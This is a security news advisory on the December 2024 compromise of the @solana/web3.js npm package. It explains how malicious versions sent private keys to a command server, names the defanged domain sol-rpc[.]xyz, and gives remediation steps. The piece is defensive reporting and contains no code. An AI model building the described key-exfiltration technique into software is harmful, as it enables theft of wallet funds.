Critical Backdoor Discovered in Solana's Popular @solana/web3.js npm Library

December 4, 2024

Cybersecurity researchers have uncovered a significant software supply chain attack targeting the widely-used @solana/web3.js npm package. Malicious versions 1.95.6 and 1.95.7 were published, designed to steal users' private keys and potentially drain cryptocurrency wallets. These compromised versions have since been removed from the npm registry.

What Happened?

The @solana/web3.js package, essential for developers building Node.js and web applications on the Solana blockchain, boasts over 400,000 weekly downloads. The attack involved injecting malicious code into the package to exfiltrate private keys from unsuspecting developers and users.

According to security firm Socket, the injected code added an addToQueue function that secretly transmitted private keys via seemingly legitimate Cloudflare headers to a command-and-control (C2) server at sol-rpc[.]xyz. Security researcher Christophe Tafani-Dereeper noted that calls to this function were inserted in places that legitimately accessed private keys, making the malicious activity difficult to detect.

How Did This Happen?

It's suspected that the maintainers of the npm package fell victim to a phishing attack, allowing threat actors to compromise their accounts and publish the rogue versions. Steven Luscher, one of the library's maintainers, confirmed:

"A publish-access account was compromised for @solana/web3.js, a JavaScript library commonly used by Solana dApps. This allowed an attacker to publish unauthorized and malicious packages that were modified, enabling them to steal private key material and drain funds from dApps that handle private keys directly."

Who Is Affected?

The incident impacts projects that:

• Directly handle private keys.
• Updated to versions 1.95.6 or 1.95.7 between 3:20 p.m. UTC and 8:25 p.m. UTC on December 2, 2024.

Non-custodial wallets and applications that do not expose private keys during transactions are generally not affected.

What Should You Do?

If you are using @solana/web3.js as a dependency:

1. Update Immediately: Upgrade to the latest version (1.95.8 or newer) to remove the malicious code.
2. Rotate Keys: If you suspect compromise, rotate your authority keys to secure your assets.
3. Audit Dependencies: Review your project's dependencies for any unauthorized changes or updates.

Wider Implications

This attack underscores the vulnerabilities inherent in the open-source ecosystem, particularly within package registries like npm. Threat actors continue to exploit these platforms to distribute malware, capitalizing on the trust developers place in widely-used libraries.

Recently, a fraudulent Solana-themed npm package named solana-systemprogram-utils was discovered. It was designed to reroute a user's funds to an attacker-controlled wallet in 2% of transactions, cleverly minimizing suspicion while still siphoning funds.

Security researcher Kirill Boychenko highlighted the risks:

"The malware threatens individual developers by stealing their credentials and wallet data, which can lead to direct financial losses. For organizations, compromised systems create vulnerabilities that can spread throughout enterprise environments, enabling widespread exploitation."

Conclusion

The discovery of the backdoor in @solana/web3.js serves as a critical reminder of the importance of vigilance in software supply chains. Developers should:

• Regularly audit and monitor dependencies.
• Implement security best practices, such as two-factor authentication for account access.
• Stay informed about potential threats and updates within the ecosystem.

Protecting the integrity of development environments is paramount to safeguarding both individual and organizational assets in the rapidly evolving landscape of blockchain technology.

Stay safe and ensure your applications are secure by integrating robust security tools and practices into your development workflow.